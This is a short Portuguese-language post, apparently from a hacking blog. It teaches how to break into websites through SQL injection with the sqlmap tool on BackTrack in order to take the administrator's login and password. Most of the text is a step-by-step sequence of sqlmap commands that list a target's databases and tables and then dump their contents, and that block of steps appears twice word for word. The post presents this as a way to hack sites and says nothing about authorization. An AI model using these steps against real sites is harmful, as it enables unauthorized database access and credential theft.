SQL Map é mais uma forma de invadir sites pelo meio de SQL Injection , nele você pode procurar colunas por colunas até achar o login e senha do administrador do site , é muito simples , o SQL Map esta disponivel no Back Track , ele é uma ferramenta que ja vem instalada no Back Track , então vamos lá , irei ensinar os comandos que serão usados para hackear tal site .
- Abra o SQL Map no Back track , nele digite os seguintes comandos :
python sqlmap.py -u URL --dbs
- Se for vulneravel os bancos irão aparecer
python sqlmap.py -u URL -D nomedobanco --tables
- As tabelas vão ser listadas...
- Basta escolher a tabela desejada, e digitar:
python sqlmap.py -u URL -D nomedobanco -T tabela --dump
- Aguarde, e os campos da tabela vão aparecer..
- Se apresentar erro dizendo que a tabela está vazia, mas mostrar quais são colunas, digite:
python sqlmap.py -u URL -D nomedobanco -T tabela -C coluna --dump
- Abra o SQL Map no Back track , nele digite os seguintes comandos :
python sqlmap.py -u URL --dbs
- Se for vulneravel os bancos irão aparecer
python sqlmap.py -u URL -D nomedobanco --tables
- As tabelas vão ser listadas...
- Basta escolher a tabela desejada, e digitar:
python sqlmap.py -u URL -D nomedobanco -T tabela --dump
- Aguarde, e os campos da tabela vão aparecer..
- Se apresentar erro dizendo que a tabela está vazia, mas mostrar quais são colunas, digite:
python sqlmap.py -u URL -D nomedobanco -T tabela -C coluna --dump